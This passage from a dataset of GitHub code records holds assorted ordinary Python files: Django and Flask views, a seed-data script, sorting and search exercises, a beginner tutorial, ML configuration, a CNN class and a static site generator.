sess.run(rtt.SecureReveal(res))\n print('ret:', plain_res) # ret: 1.0\n\n val_w = sess.run(w)\n print(\"w(before assign): {}\".format(val_w))\n sess.run(assign_w, feed_dict={placeholder_x : rtt.private_input(0, train_x), placeholder_y: rtt.private_input(1, train_y)})\n val_w = sess.run(w)\n print(\"w(after assign): {} w.shape: {}\".format(val_w, val_w.shape))\n\n plain_w = sess.run(rtt.SecureReveal(w))\n print(\"w(after assign): {}\".format(plain_w))\n\nrtt.deactivate()\n","repo_name":"victerying/bishe","sub_path":"test/test0.py","file_name":"test0.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23469458174","text":"a = 1 # =은 assignment라고 한다.\nb = 'python'\nc= [1, 2, 3]\n# C나 JAVA에서는 변수를 만들 때 자료형을 직접 지정해야 하지만 파이썬은\n# 변수에 저장된 값을 스스로 판단하여 자료형을 저장한다.\n#변수이름 = 변수에 저장할 값 이런 형태.\n#변수는 객체를 말한다. 객체는 지금까지 한 자료형 같은 것을 의미.\n# a = [1, 2, 3]의 경우 [1, 2, 3]값을 가지는 리스트 자료형(객체)이 자동으로 \n#메모리에 생성되고 변수 a는 [1, 2, 3]리스트가 저장된 메모리의 주소를 가리키게 됨.\na = [1, 2, 3]\nprint(id(a)) #이처럼 id(변수이름)을 통해 변수가 가리키는 메모리 주소 파악 가능.\na = [1, 2, 3]\nb = a #[1, 2, 3]리스트를 참조하는 변수가 기존에 a 하나에서 b까지 두 개로 늘어남.\n#b는 a와 완전히 동일하다 할 수 있음.\nprint(a is b) #이를 통해 a와 b가 완전히 동일하다는 것 확인가능.\na[1] = 4\nprint(a)\nprint(b)\n#그렇다면, b변수를 생성할 때 a변수의 값은 가져오되 a와는 다른 주소를 갖게 하려면?\n#두가지 방법 중 첫번째 [:]이용하기 [:]는 리스트 전체를 가리킴.\na = [1, 2, 3]\nb = a[:]\na[1] = 4\nprint(a)\nprint(b)\n#두번째 방법으로 copy모듈 이용하기\nfrom copy import copy #파이썬 모듈부분에서 자세히 다룰 예정.\na = [1, 2, 3]\nb =copy(a)\nprint(b is a)\n#리스트 자료형의 자체함수인copy함수를 사용해도 copy모듈을 사용하는 것과 동일함.\na = [1, 2, 3]\nb = a.copy()\nprint(b is a)\na, b = ('python' , 'life')\n(a, b) = 'python', 'life'#튜플은 괄호를 생략해도 된다고 했음.\n[a, b] = ['python', 'life'] #리스트도 변수로 만들 수 있음.\na = b ='python' #이처럼 여러개의 변수에 하나의 값을 저장할 수도 있음.\na = 3\nb = 5\na, b = b, a\nprint(a)\nprint(b)\n","repo_name":"seungk-new/jumptopython","sub_path":"SecondLife/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6164946536","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render,redirect,HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nfrom .forms import SignUpForm\ndef signup(request):\n if request.method=='POST':\n forms=SignUpForm(request.POST)\n print(forms)\n if forms.is_valid():\n forms.save()\n return redirect('users-login')\n else:\n forms = SignUpForm()\n context={\n 'forms':forms\n }\n return render(request,'users/signup.html',context)\n@login_required\ndef profile(request):\n return render(request,'users/profile.html')\n\nfrom django.core.mail import EmailMessage\ndef send_email(request):\n em = EmailMessage('subject', 'This is test msg', to=['islomiy1101@gmail.com'])\n em.send()\n return HttpResponse('JONADI')\n\n","repo_name":"islomiy0010/blogapp","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4845418017","text":"def rotationList_Linier(lst):\n if len(lst)<2:\n return 0\n\n position =0\n while position < len(lst)-1:\n if(lst[position] > lst[position+1]):\n return (position + 1)\n position += 1\n\n\ndef count_rotations_binary(nums):\n lo = 0\n hi = len(nums) -1\n # to handle the List with no element and element without rotation\n if len(nums) < 2 or nums[0] 0 and mid_number < nums[mid-1] :\n # The middle position is the answer\n return mid\n\n elif mid_number < nums[hi] :\n # Answer lies in the left half\n hi = mid - 1\n\n elif mid_number > nums[hi]:\n # Answer lies in the right half\n lo = mid + 1\n\n return 0\n\n# 1. List has 7 element (order), and rotated 3 time\n# lst = [0 , 2, 3, 4 , 5, 6, 9, 10]\n# lst = [5, 6, 9, 10 , 0 , 2, 3, 4]\n# lst = [10 ,0 , 2, 3, 4 , 5, 6, 9]\n# lst = [2, 3, 4 , 5,6 , 9, 10 ,0 ]\n\n\nlst = []\n\nprint(rotationList_Linier(lst))\nprint(count_rotations_binary(lst))\n\n# 2. List has 10 element (Even) , adn rotate 3 time\n# 3. List rotated N Times, where N is number of element. o/p = 0\n# 4. List rotated (N-1) Times, where N is number of element. o/p = N-1\n# 5. List given is empty o/p = 0\n# 6. List may have negative number and positive number mix rotated 5 times\n\n","repo_name":"MrVivekKUMAR/04.DataStructure-and-Algorithm_Jovian.ai","sub_path":"2. Assignment1_Rotation of List.py","file_name":"2. Assignment1_Rotation of List.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38373965444","text":"from flask import request\nfrom flask_restful import Resource\n\nfrom Model import db,Assessment, Completed,CompletedSchema\nimport flask_jwt_extended\n\ncompleted_schema = CompletedSchema()\n\nclass Complete(Resource):\n @flask_jwt_extended.jwt_required\n def get(self):\n user_id = flask_jwt_extended.get_jwt_identity()[\"id\"]\n completed = Completed.query.filter_by(user_id=int(user_id)).all()\n if completed:\n result = []\n for complete in completed:\n result.append(completed_schema.dump(complete).data)\n return result,201\n else:\n return {'message': 'No paramater found.'}, 404\n\n @flask_jwt_extended.jwt_required\n def post(self):\n json_data = request.get_json(force=True)\n json_data[\"user_id\"] = flask_jwt_extended.get_jwt_identity()[\"id\"]\n if not json_data:\n return {'message': 'No input data provided'}, 400\n # Validate and deserialize input\n data, errors = completed_schema.load(json_data)\n if errors:\n return errors, 400\n print(data)\n assessment = Assessment.query.get(json_data['question_id'])\n if assessment:\n if assessment.answer == json_data[\"answer\"]:\n already_completed = Completed.query.filter_by(\n question_id=data['question_id'],user_id = data['user_id']).first()\n if already_completed:\n return {\"message\": 'Correct Answer!'}\n completed = Completed(\n question_id = data[\"question_id\"],\n user_id = data['user_id'],\n )\n completed.save()\n result = completed_schema.dump(completed).data\n\n return { \"status\": 'success', \n \"message\": 'Correct Answer!', 'data': result }, 201\n\n return {\"message\":\"Wrong Answer\"}\n \n","repo_name":"ajoyac/basilisk","sub_path":"resources/completed.py","file_name":"completed.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70291800860","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nfrom . import DiceArgs\n\nclass FunctionalDiceArgs:\n def __init__(self, func):\n if type(func).__name__ == 'function':\n self.func = func\n else:\n raise Exception('Type error: func')\n\n def to_dice_args(self, var):\n if type(var) == int:\n return DiceArgs(var, [self.func(var)])\n elif type(var) == DiceArgs:\n return DiceArgs(var.value, [self.func(var.value)])\n else:\n raise Exception('Type error: var')\n","repo_name":"k-seta/trpg-bot","sub_path":"trpg_bot/mode/args/FunctionalDiceArgs.py","file_name":"FunctionalDiceArgs.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"34320299468","text":"# Importando las herramientas necesarias para definir las rutas URL\nfrom django.urls import path\n# Importa las vistas del módulo actual\nfrom . import views\n\n# Lista de rutas URL para la aplicación\nurlpatterns = [\n # Cuando se accede a 'registro/', se redirige a la función de vista 'register_view' y tiene un nombre de ruta 'registro'\n path('registro/', views.register_view, name='registro'),\n \n # Ruta para iniciar sesión\n path('login/', views.login_view, name='login'),\n \n # Ruta de bienvenida tras iniciar sesión\n path('bienvenido/', views.bienvenido_view, name='bienvenido'),\n \n # Ruta para cerrar sesión\n path('logout/', views.logout_view, name='logout'),\n \n # Una ruta de prueba, posiblemente para propósitos de desarrollo o para una función específica\n path('prueba/', views.some_view, name='prueba'),\n \n # Una vista relacionada con una funcionalidad de \"arrastrar y soltar\" (drag and drop)\n path('drag_drop_view/', views.drag_drop_view, name='drag_drop_view'),\n \n # Una vista de bienvenida específica para usuarios invitados\n path('bienvenido_invitado/', views.bienvenido_invitado_view, name='bienvenido_invitado'),\n]\n\n","repo_name":"eduardofrancisco1733533/matlogcom","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11370290092","text":"import random\nimport names\nimport csv\nfrom django.db import IntegrityError\nfrom django.template.defaultfilters import slugify\nfrom orcamentos.utils.gen_random_values import gen_string\nfrom orcamentos.crm.models import Employee, Customer, Person, Seller, Occupation\nfrom orcamentos.proposal.models import Entry, Work\nfrom orcamentos.utils.gen_random_values import *\nfrom orcamentos.utils.gen_names import *\nfrom orcamentos.utils.lists import URGENTE, ALTA, NORMAL, BAIXA, OCCUPATION_LIST, COMPANY_LIST\n\n\n# ------------ Employee -------------------------\nhashpass = 'pbkdf2_sha256$12000$Pe4addAsDo1D$xEtHWLnSIVkEppr4pbK69SBhuLwWsSHdXyhkCZBNktA='\n\n# Primeiro verifica se existe os cargos, caso contrário os grava.\nif not Occupation.objects.all().count():\n obj = [Occupation(occupation=val) for val in OCCUPATION_LIST]\n Occupation.objects.bulk_create(obj)\n\n\ndef get_occupation(occupation_name):\n occupation = Occupation.objects.get(occupation=occupation_name)\n return occupation\n\n\nemployees = {\n 'jose': {\n 'username': 'jose',\n 'first_name': 'José',\n 'last_name': 'Carlos Frederico',\n 'occupation': 'Vendedor',\n 'gender': 'M',\n 'treatment': 'sr',\n 'company': 'Bot',\n 'department': 'Vendas',\n 'cpf': '88922876699',\n 'rg': '967728378',\n 'address': 'Estrada Macacu, 1530',\n 'complement': '',\n 'district': 'Centro',\n 'city': 'São Paulo',\n 'uf': 'SP',\n 'cep': '01627400'},\n 'regis': {\n 'username': 'regis',\n 'first_name': 'Regis',\n 'last_name': 'da Silva Santos',\n 'occupation': 'Vendedor',\n 'gender': 'M',\n 'treatment': '',\n 'company': 'RG Solutions',\n 'department': 'TI',\n 'cpf': '15895419181',\n 'rg': '305467840',\n 'address': 'Praça Otaviano de Paulo, 89',\n 'complement': 'Apto 44',\n 'district': 'Pompéia',\n 'city': 'São Paulo',\n 'uf': 'SP',\n 'cep': '01727389'},\n 'adailton': {\n 'username': 'adailton',\n 'first_name': 'Adailton',\n 'last_name': 'do Nascimento',\n 'occupation': 'Vendedor',\n 'gender': 'M',\n 'treatment': '',\n 'company': 'RG Solutions',\n 'department': 'TI',\n 'cpf': '41895976210',\n 'rg': '535121673',\n 'address': 'Rua Jaqueira, 460',\n 'complement': '',\n 'district': 'Santo Antonio',\n 'city': 'Aparecida de Goiânia',\n 'uf': 'GO',\n 'cep': '10282900'}\n}\n\n\nfor k in employees:\n slug = slugify('{} {}'.format(\n employees[k]['first_name'], employees[k]['last_name']))\n Employee.objects.create(\n username=employees[k]['username'],\n first_name=employees[k]['first_name'],\n last_name=employees[k]['last_name'],\n slug=slug,\n email=employees[k]['username'] + '@example.com',\n is_staff=True,\n password=hashpass,\n occupation=get_occupation(employees[k]['occupation']),\n gender=employees[k]['gender'],\n treatment=employees[k]['treatment'],\n company=employees[k]['company'],\n department=employees[k]['department'],\n cpf=employees[k]['cpf'],\n rg=employees[k]['rg'],\n address=employees[k]['address'],\n complement=employees[k]['complement'],\n district=employees[k]['district'],\n city=employees[k]['city'],\n uf=employees[k]['uf'],\n cep=employees[k]['cep'],\n )\n\n# ------------ Work -------------------------\ncustomer_list = []\nwork_list = []\naddress_list = []\n\n''' Lendo os dados de obras_.csv '''\nwith open('fix/obras_.csv', 'r') as f:\n r = csv.DictReader(f)\n for dct in r:\n work_list.append(dct)\n f.close()\n\n''' Lendo os dados de clientes_.csv '''\nwith open('fix/clientes_.csv', 'r') as f:\n r = csv.DictReader(f)\n for dct in r:\n customer_list.append(dct)\n f.close()\n\n''' Lendo os dados de enderecos_.csv 
'''\nwith open('fix/enderecos_.csv', 'r') as f:\n r = csv.DictReader(f)\n for dct in r:\n address_list.append(dct)\n f.close()\n\nif not Occupation.objects.all().count():\n obj = [Occupation(occupation=val) for val in OCCUPATION_LIST]\n Occupation.objects.bulk_create(obj)\n\nphoto = 'http://icons.iconarchive.com/icons/icons-land/vista-people/256/Office-Customer-Male-Light-icon.png'\n\nif not Person.objects.all().count():\n for i in range(25):\n occupation_id = random.randint(1, 8)\n occupation = Occupation.objects.get(pk=occupation_id)\n g = random.choice(['M', 'F'])\n if g == 'M':\n treatment = gen_male_first_name()['treatment']\n first_name = gen_male_first_name()['first_name']\n else:\n treatment = gen_female_first_name()['treatment']\n first_name = gen_female_first_name()['first_name']\n last_name = names.get_last_name()\n company = random.choice(COMPANY_LIST)\n cpf = gen_cpf()\n rg = gen_rg()\n slug = slugify('{} {}'.format(first_name, last_name))\n email = first_name[0].lower() + '.' + \\\n last_name.lower() + '@example.com'\n obj = Person(\n person_type='p',\n gender='M',\n treatment=treatment,\n first_name=first_name,\n last_name=last_name,\n slug=slug,\n photo=photo,\n company=company,\n occupation=occupation,\n email=email,\n cpf=gen_cpf(),\n rg=gen_rg(),\n address=address_list[i]['address'],\n district=address_list[i]['district'],\n city=address_list[i]['city'],\n uf=address_list[i]['uf'],\n cep=address_list[i]['cep'],\n )\n obj.save()\n\n\nif not Customer.objects.all().count():\n for i in range(len(customer_list)):\n g = random.choice(['M', 'F'])\n if g == 'M':\n treatment = gen_male_first_name()['treatment']\n first_name = gen_male_first_name()['first_name']\n else:\n treatment = gen_female_first_name()['treatment']\n first_name = gen_female_first_name()['first_name']\n last_name = names.get_last_name()\n email = first_name[0].lower() + '.' 
+ \\\n last_name.lower() + '@example.com'\n slug = slugify('{} {}'.format(first_name, last_name))\n obj = Customer(\n person_type='c',\n gender='M',\n treatment='sr',\n first_name=first_name,\n last_name=last_name,\n slug=slug,\n company=random.choice(COMPANY_LIST),\n email=email,\n customer_type=customer_list[0]['customer_type'],\n cpf=gen_cpf(),\n rg=gen_rg(),\n cnpj=gen_digits(14),\n ie='isento',\n address=address_list[i]['address'],\n district=address_list[i]['district'],\n city=address_list[i]['city'],\n uf=address_list[i]['uf'],\n cep=address_list[i]['cep'],\n )\n obj.save()\n\n\nREPEAT = len(work_list)\n\nfor i in range(REPEAT):\n # obtem todos os pk de contatos\n person_pks = [pk[0] for pk in Person.objects.all().values_list('pk')]\n p = choice(person_pks)\n person = Person.objects.get(pk=p)\n # obtem todos os pk de clientes\n customer_pks = [pk[0] for pk in Customer.objects.all().values_list('pk')]\n c = choice(customer_pks)\n customer = Customer.objects.get(pk=c)\n obj = Work(\n name_work=work_list[i]['name_work'],\n slug=work_list[i]['slug'],\n person=person,\n customer=customer,\n address=address_list[i]['address'],\n district=address_list[i]['district'],\n city=address_list[i]['city'],\n uf=address_list[i]['uf'],\n cep=address_list[i]['cep'],\n )\n try:\n obj.save()\n except IntegrityError:\n print('Registro existente.')\n\n\n# ------------ Entry -------------------------\npriority_list = (URGENTE, ALTA, NORMAL, BAIXA)\n\n\n# Return min id of work\ntry:\n min_work_pk = Work.objects.order_by('pk')[0].pk\nexcept IndexError:\n min_work_pk = None\n\n\n# Return max id of work\ntry:\n max_work_pk = Work.objects.latest('pk').id\nexcept Work.DoesNotExist:\n max_work_pk = None\n\n\nREPEAT = max_work_pk + 1\n\nfor i in range(min_work_pk, REPEAT):\n priority = choice(priority_list)\n work = Work.objects.get(pk=i)\n # obtem todos os pk de contatos\n person_pks = [pk[0] for pk in Person.objects.all().values_list('pk')]\n p = choice(person_pks)\n person = Person.objects.get(pk=p)\n # obtem todos os pk de vendedores\n seller_pks = [pk[0] for pk in Seller.objects.all().values_list('pk')]\n c = choice(seller_pks)\n seller = Seller.objects.get(pk=c)\n description = gen_string(30)\n obj = Entry(\n priority=priority,\n work=work,\n person=person,\n description=description,\n seller=seller,\n )\n obj.save()\n\n\n# done\n","repo_name":"rg3915/orcamentos","sub_path":"shell/shell_entry.py","file_name":"shell_entry.py","file_ext":"py","file_size_in_byte":8909,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"69"}
+{"seq_id":"36593322567","text":"def merge_sort(arr):\n \"\"\"\n Implements the recursive merge sort algorithm:\n\n 1. If array has >= 2 elements, split the arr as evenly as possible\n 2. Perform merge sort on the child elements\n 3. Merge the results into a sorted list\n\n :return:\n \"\"\"\n\n if len(arr) in {0, 1}:\n return arr\n\n else:\n # Split the array into two\n pivot = len(arr) // 2\n\n arr1 = [arr[k] for k in range(0, pivot)]\n arr2 = [arr[k] for k in range(pivot, len(arr))]\n\n return merge(merge_sort(arr1), merge_sort(arr2))\n\n\ndef merge(arr1, arr2):\n \"\"\"\n Helper function that merges two (sorted) arrays by iterating over them at the same time and popping the minimum\n element at the head of either array to the output array\n\n :param arr1:\n :param arr2:\n :return:\n \"\"\"\n\n out = []\n i = j = 0\n\n # Now merge\n while (i + j) < len(arr1) + len(arr2):\n\n if j == len(arr2) or (i < len(arr1) and arr1[i] < arr2[j]):\n out.append(arr1[i])\n i += 1\n else:\n out.append(arr2[j])\n j += 1\n\n return out","repo_name":"qichaozhao/cs50","sub_path":"py_sorts/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23420271641","text":"# importing module\nimport random\n\nnumber = random.randint(0, 5)\nguessing = 0\n\nwhile guessing < 3:\n player = int(input(\"Enter Your Guess : \"))\n if player == number:\n print(\"Your Guess is right\")\n break\n else:\n print(\"Your guess is wrong\")\n guessing += 1\n\nprint(\"Your Game has ended\")\nprint(\"The guess number is \" + str(number))","repo_name":"shreyansh-sawarn/Hacktoberfest","sub_path":"Python/guessnumber.py","file_name":"guessnumber.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"37349554320","text":"# 数据集,可根据需要增加英文或其它字符\r\n\r\nSETS = [str(i) for i in range(10)] + \\\r\n [chr(ord('a')+i) for i in range(0, 26)] + \\\r\n [chr(ord('A')+i) for i in range(0, 26)] + \\\r\n [',', '.', '?', ';', '\"', '[', ']', '{', '}',\r\n '`', '~', '!', '@', '#', '$', '%', '^', '&',\r\n '*', '(', ')', '-', '=', '_', '+', '|', '\\\\',\r\n '/', '<', '>', ':', \"'\"]\r\n\r\n# 分类数量\r\nnum_classes = len(SETS) + 1 # 数据集字符数+特殊标识符\r\n\r\n# 图片大小,32 x 256\r\nOUTPUT_SHAPE = (32, 256)\r\n\r\n# 学习率\r\nINITIAL_LEARNING_RATE = 1e-3\r\nDECAY_STEPS = 5000\r\nREPORT_STEPS = 100\r\nLEARNING_RATE_DECAY_FACTOR = 0.9\r\nMOMENTUM = 0.9\r\n\r\n# LSTM网络层次\r\nnum_hidden = 128\r\nnum_layers = 2\r\n\r\n# 训练轮次、批量大小\r\nnum_epochs = 50000\r\nBATCHES = 10\r\nBATCH_SIZE = 32\r\nTRAIN_SIZE = BATCHES * BATCH_SIZE\r\n\r\n# 数据集目录、模型目录\r\ndata_dir = \"/tmp/lstm_ctc_data/\"\r\nmodel_dir = \"/tmp/lstm_ctc_model/\"","repo_name":"DemonXD/AIOHttp-enhancOCR","sub_path":"torch/lstm_ctc/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16596728750","text":"'''\n1. 행렬 경로의 이동상의 규칙을 다음과 같이 적용한다 하자. \n\n- 오른쪽이나 아래쪽, 또는 오른쪽 대각선으로만 이동할 수 있다. (=> 오른쪽 하단만 해당한다고 여김)\n- 왼쪽, 위쪽으로의 이동과 여타의 대각선 이동은 허용하지 않는다.\n\nn x n 행렬의 왼쪽 위(1,1) 에서 시작해 오른쪽 아래(n,n)까지 한 칸씩 이동하여 도달할 때 \n모든 경로의 점수 중 가장 높은 점수를 찾는 동적 프로그래밍 알고리즘을 작성하시오.\n\n------------------------------------------------------------------------------------\n행렬과 같은 크기의 DP 배열의 각 칸 안에 \n해당 칸까지 규칙을 따라 갔을 때 얻을 수 있는 최고점을 저장한다. (메모이제이션)\n해당 칸보다 더 도착지에 가까워지도록 문제를 확장할 때에는 거기에서 불러와서 쓴다.\n문제가 정사각형 형태이기 때문에 1*1 => 2*2로 확장할 수 있어서 왼쪽, 위, 왼쪽대각선을 보면 됨.\n'''\nimport sys\n\nN = int(sys.stdin.readline()) #행렬 사이즈\n\nboard = [] \n\nfor i in range(N): # 보드 구성\n temp = list(map(int, sys.stdin.readline().split())) \n board.append(temp)\n\ndp = [] # dp 초기화\nfor i in range(N): \n dp.append([])\n for j in range(N):\n dp[i].append(0)\n\nfor i in range(N): # i는 행\n for j in range(N): #j는 열\n val = board[i][j]\n left = 0\n up = 0\n cross = 0\n if i-1 >= 0:\n up = dp[i-1][j]\n if j-1 >= 0:\n left = dp[i][j-1]\n if i-1 >= 0 and j-1 >= 0:\n cross = dp[i-1][j-1]\n\n dp[i][j] = val+max(up, left, cross)\n\nprint(dp[N-1][N-1])","repo_name":"S00ahKim/programmers","sub_path":"way_to_go.py","file_name":"way_to_go.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35154952666","text":"__author__ = \"Patrick Nicolas\"\n__copyright__ = \"Copyright 2020, 2022 All rights reserved.\"\n\nimport torch\nfrom util.plottermixin import PlotterMixin\nfrom models.nnet.neuralnet import NeuralNet\nfrom models.cnn.convmodel import ConvModel\nfrom models.cnn.convneuralblock import ConvNeuralBlock\nfrom models.nnet.hyperparams import HyperParams\nfrom torch.utils.data import Dataset, DataLoader\n\n\n\"\"\"\n Configurable convolutional neural network. \n - A convolutional neural network is composed of neural block\n - Each block is composed of Convolution, Batch normalization, activation, max pooling and optionally a \n dropout module\n This class inherits from \n - NeuralNet for training and evaluation\n - PlotterMixin for displaying \n \n :param conv_vae_model: Convolutional Neural Network encoder_model or layout as a composition of Neural blocks\n :type conv_vae_model: cnn.convnetmodel.ConvNetModel\n :param hyper_params: Training (hyper) parameters used for tuning\n :type hyper_params: nnet.hyperparams.HyperParams\n :param debug: Transform the label input_tensor prior to loss function (encoder, labels) -> converted labels\n :type debug: (list[torch.Tensor], list[torch.Tensor]) -> torch.Tensor\n :param post_epoch_func:\n\"\"\"\n\n\nclass ConvNet(NeuralNet, PlotterMixin):\n def __init__(self,\n conv_net_model: ConvModel,\n hyper_params: HyperParams,\n debug):\n super(ConvNet, self).__init__(hyper_params, debug)\n self.conv_net_model = conv_net_model\n\n @classmethod\n def init(cls, config, conv_net_model: ConvModel, loss_func: torch.nn.Module, debug):\n \"\"\"\n Alternative constructor for hyper-parameters tuning\n :param config: Ray tune config\n :param conv_net_model: Convolutional model\n :param loss_func: Loss function\n :param debug:\n :returns: instance of Neural net\n \"\"\"\n hyper_params = HyperParams(config['learning-rate'], config['momentum'], 30, config['batch_size'], 10.0, loss_func)\n return ConvNet(conv_net_model, hyper_params, debug)\n\n def apply_debug(self, features: list, labels: list, title: str):\n \"\"\"\n Apply a debug information related to the list of encoder (for debugging purpose)\n :param features: list of encoder\n :param labels: List of labels\n :param title: Title or description of the debugging info\n \"\"\"\n if self._debug is not None:\n self._debug(features, labels, title)\n\n def model_label(self) -> str:\n return self.conv_net_model.model_label()\n\n def train_and_eval(self, dataset: Dataset):\n \"\"\"\n Training and evaluation of a given encoder_model, conv_vae_model, with a given set of the hyper-parameters\n :param dataset: Data set (encoder, labels) used for training\n \"\"\"\n NeuralNet.train_and_eval(self, dataset, self.conv_net_model)\n\n\n def train_then_eval(self, train_loader: DataLoader, test_loader: DataLoader):\n \"\"\"\n Training and evaluation of a given encoder_model, conv_vae_model, with a given set of the hyper-parameters\n :param train_loader Data loader for the training data\n :param test_loader Data loader for the evaluation data\n \"\"\"\n NeuralNet.train_then_eval(self, train_loader, test_loader, self.conv_net_model)\n\n def __repr__(self):\n return f'Convolutional encoder_model:\\n{repr(self.conv_net_model)}\\nHyper-parameters:\\n{repr(self.hyper_params)}'\n\n def __str__(self):\n return self.__repr__()\n\n @staticmethod\n def feature_extractor(\n model_id: str,\n dim: int,\n in_channels: int,\n hidden_dim: int,\n out_channels: int,\n params: list) -> ConvModel:\n \"\"\"\n Static method to 
generate a convolutional neural model with increasing number\n of input_tensor/output channels ( * 2). This convolutional model does not have connected layer\n The convolutional parameters are: kernel_size, stride, padding, batch_norm, activation.\n :param model_id: Dimension of the convolution\n :param dim: Dimension of the convolution (1 time series, 2 images, 3 video..)\n :param in_channels: Size of the latent space\n :param hidden_dim: Size of the intermediate blocks\n :param out_channels: Number of output channels\n :param params: List of convolutional parameters {kernel_size, stride, padding, batch_norm, max_pooling_kernel, activation}\n \"\"\"\n assert in_channels > 0, f'z_dim {in_channels} should be > 0'\n assert hidden_dim > 1, f'hidden_dim {hidden_dim} should be > 1'\n assert out_channels > 0, f'output_dim {out_channels} should be > 0'\n assert len(params) > 1, f'Number of parameters for cascading blocks {len(params)} should be > 1'\n assert len(params[0]) == 6, f'Size of parameters {len(params[0])} should be 6'\n\n in_size = in_channels\n num_conv_params = len(params)\n out_size = hidden_dim\n blocks = []\n\n # Iteratively generate Convolution neural blocks\n for index in range(num_conv_params):\n kernel_size, stride, padding, batch_norm, max_pooling_kernel, activation = params[index]\n new_block = ConvNeuralBlock(\n dim,\n in_size,\n out_size,\n kernel_size,\n stride,\n padding,\n batch_norm,\n max_pooling_kernel,\n activation,\n False,\n False)\n blocks.append(new_block)\n in_size = out_size\n out_size = out_channels if index == num_conv_params - 2 else out_size * 2\n\n # Finally assemble the Convolutional model\n model = ConvModel.build(model_id, dim, blocks, None)\n del blocks\n return model\n","repo_name":"patnicolas/Neural_architecture","sub_path":"models/cnn/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74166764379","text":"import argparse\nimport logging\nimport os\nimport os.path as osp\nimport posixpath\nimport shutil\nimport stat\nimport sys\n\nimport jinja2\n\nimport rsitegen.conf\nfrom rsitegen.conf import config\n#import rsitegen.plugins\nfrom rsitegen.node import *\nimport rsitegen.templates as templates\nimport rsitegen.util\n\nlogger = logging.getLogger()\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"rsitegen: Static site generator\")\n\n parser.add_argument(\"src\", nargs='?', help=\"Source directory (SOURCEDIR)\")\n parser.add_argument(\"dest\", nargs='?', help=\"Output directory (DESTDIR)\")\n parser.add_argument(\"-c\", \"--config\", help=\"Configuration file to use\")\n parser.add_argument('-D', \"--debug\", action=\"store_true\", default=False,\n help=\"Debug mode\")\n\n args = parser.parse_args()\n\n assert args.debug is not None\n config[\"DEBUG\"] = args.debug\n if args.debug:\n logger.setLevel(logging.DEBUG)\n\n if args.src is not None:\n config[\"SOURCEDIR\"] = args.src\n\n if args.dest is not None:\n config[\"DESTDIR\"] = args.dest\n\n return args\n\n\ndef init_config():\n required = (\"SOURCEDIR\", \"DESTDIR\")\n args = parse_arguments()\n if args.config is not None:\n config_file = args.config\n else:\n config_file = \"siteconf.py\"\n\n config.load_config_file(config_file)\n\n for req in required:\n if req not in config:\n logger.critical(req + \" must be provided in the configuration file\"\n \" or on the command line.\")\n sys.exit(1)\n\n\ndef init_logger():\n logger.addHandler(logging.StreamHandler())\n\n\ndef get_dir_template(dirpath, filenames):\n for template in config[\"DIRINDEX_TEMPLATES\"]:\n if template in filenames:\n return osp.join(dirpath, template)\n\n return util.get_theme_template(\"directory\")\n\n\ndef render_all(root, path='/'):\n cur = root\n logger.debug(\"Rendering directory %s (%s)\", path, type(root).__name__)\n root.render(root, path)\n for name,child in root.children.items():\n childpath = posixpath.join(path, name)\n if isinstance(child, DirNode):\n render_all(child, childpath)\n else:\n logger.debug(\"Rendering %s (%s)\", childpath,\n type(child).__name__)\n child.render(root, childpath)\n\n\ndef main():\n init_logger()\n init_config()\n for k,v in config.items():\n logger.debug('config[\"' + k + '\"]=' + str(v))\n\n jinja_env = templates.init_env()\n\n parent = None\n root = None\n for dirpath,dirnames,filenames in os.walk(config[\"SOURCEDIR\"]):\n #logger.debug(\"Processing directory %s\", dirpath)\n rel_dirpath = osp.relpath(dirpath, config[\"SOURCEDIR\"])\n if rel_dirpath == '.':\n rel_dirpath = ''\n curdir = DirNode(rel_dirpath, parent, osp.basename(rel_dirpath), jinja_env,\n get_dir_template(dirpath, filenames))\n if root is None:\n root = curdir\n parent = curdir\n\n for f in filenames:\n path = osp.join(dirpath, f)\n relpath = osp.join(rel_dirpath, f)\n #logger.debug(\"Processing file %s\", path)\n # if osp.islink(path):\n # node = LinkNode(relpath, os.readlink(path))\n # continue\n\n splitext = osp.splitext(f)\n base = splitext[0]\n ext = splitext[1].lstrip('.')\n if ext in config[\"PAGE_EXTENSIONS\"]:\n node = PageNode(relpath, jinja_env)\n name = base + \".html\"\n elif ext in config[\"TEMPLATE_EXTENSIONS\"]:\n node = TemplateNode(relpath, 